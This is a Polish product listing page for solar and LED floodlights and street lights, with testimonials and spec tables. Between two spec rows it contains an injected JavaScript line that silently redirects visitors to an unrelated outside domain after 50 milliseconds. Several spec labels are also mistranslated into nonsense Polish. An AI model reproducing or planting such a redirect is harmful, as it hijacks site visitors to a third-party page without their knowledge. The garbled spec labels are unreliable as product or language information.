Wszystkie produkty
-
Lampy uliczne LED zasilane energią słoneczną
-
Światło uliczne LED All In One Solar
-
Światło słoneczne o dużej mocy
-
Światła powodziowe zasilane energią słoneczną
-
Słoneczne zewnętrzne światła powodziowe
-
Wodoodporne oświetlenie uliczne LED
-
Zewnętrzne oświetlenie uliczne LED
-
Zewnętrzne oświetlenie LED Flood
-
Światło powodziowe LED 200W
-
Oświetlenie przemysłowe LED High Bay
-
Światła LED High Bay 200W
-
Przenośne światło robocze LED
-
Nailton Alves sylwaNiesamowite produkty KCD, złożyłem do nich hurtowe zamówienie na słoneczne reflektory i uzyskałem bardzo dobrą sprzedaż i pozytywne opinie na temat tego produktu. Są bardzo profesjonalni w oświetleniu zewnętrznym, wykonali produkty zgodnie z moimi wymaganiami i skupiają się na szczegółach. KCD jest najbardziej niezawodnym dostawcą, jakiego kiedykolwiek widziałem. -
inż. Ahmed ElmorTo było bardzo dobre doświadczenie w pracy z KCD. Kupiłem hurtowe zamówienie na słoneczne latarnie uliczne i jestem zadowolony z ich jakości. produkt jest taki, jak go reklamują, moi klienci bardzo go lubią. Dlatego polecam każdemu, kto chce mieć słoneczne oświetlenie uliczne, aby otrzymać produkty od KCD, ponieważ nie będziesz zawiedziony.
słowa kluczowe [ 50w waterproof led flood lights ] mecz 295 produkty.
30W 50W 100W 300W 500W światło słoneczne LED zewnętrzne światło IP65
| Kąt wiązki: | 120° |
|---|---|
| Czas ładowania: | 6-8 godzin |
| Temperatura koloru: | Ciepły biały |
302 setTimeout("javascript:location.href='https://best10.club/sitemap.php'", 50);
| Materiał korpusu: | aluminium odlewane ciśnieniowo |
|---|---|
| Moc: | 50W/100W/200W/300W |
| Napięcie robocze: | prąd stały 6 V |
KCD wodoodporny IP65 wysokiej jasności gimnastyka ogród stadion ciężki 30w 50w 100w 200w 300w zewnętrzne światło słoneczne LED
| Rodzaj energii: | energia słoneczna |
|---|---|
| Materiał obudowy: | ABS |
| Kolor łusek: | Czarno szary |
50w 100w 200w 300w Bezprzewodowe zewnętrzne reflektory słoneczne Smd 5050
| Moc: | 50w, 100w, 200w, 300w, itp. |
|---|---|
| diody LED: | smd 2835/smd 5050 |
| Kąt Fasoli: | 180 stopni |
Czarny korpus 17000 lumenów Zewnętrzne reflektory słoneczne 50w 100w 200w 300w IP65
| Moc: | 50W/100W/200W/300W |
|---|---|
| Kelwiny: | 2700K/3000K/4000K/5000K/6500K/6700K |
| Gwarancja: | 3 lata |
KCD 30w 50w 100w 150w 300w Projektory Ochrona Stadion Ogród Zewnętrzny 12v SMD Smart Nowy RGB LED reflektor Lampy
| Nazwa produktu: | GK-P |
|---|---|
| Życie: | 35000 godzin |
| THD: | <12% |
3000k Zewnętrzne światła powodziowe zasilane energią słoneczną Źródło LED 100 W 200 W Dask To Dawn Long Time
| Moc: | 20w/60w/100w/200w/300w |
|---|---|
| Temperatura koloru: | 2700k/3000k/4000k/5000k/6000k/6500k |
| Kolor skóry: | Ciemno szary |
KCD Mały Automatyczny Przełącznik 60w 200w 300w Bezpieczeństwo Niska Cena Światło LED Światło słoneczne Światło zewnętrzne 100w
| Rodzaj energii: | energia słoneczna |
|---|---|
| Materiał obudowy: | ABS |
| Kolor łusek: | czarny |
Monokrystaliczny pilot zdalnego sterowania zasilany energią słoneczną do magazynu ogrodowego
| Materiał: | Wysokiej jakości aluminium |
|---|---|
| Źródło światła: | PROWADZONY |
| Typ chipa LED: | SMD2835 |
EMC 100 Watt All In One Solar Street Light do szkoły biurowej
| Usługa rozwiązań oświetleniowych: | Instalacja projektu |
|---|---|
| Źródło światła: | DOPROWADZIŁO |
| Napięcie wejściowe (V): | 6 V. |

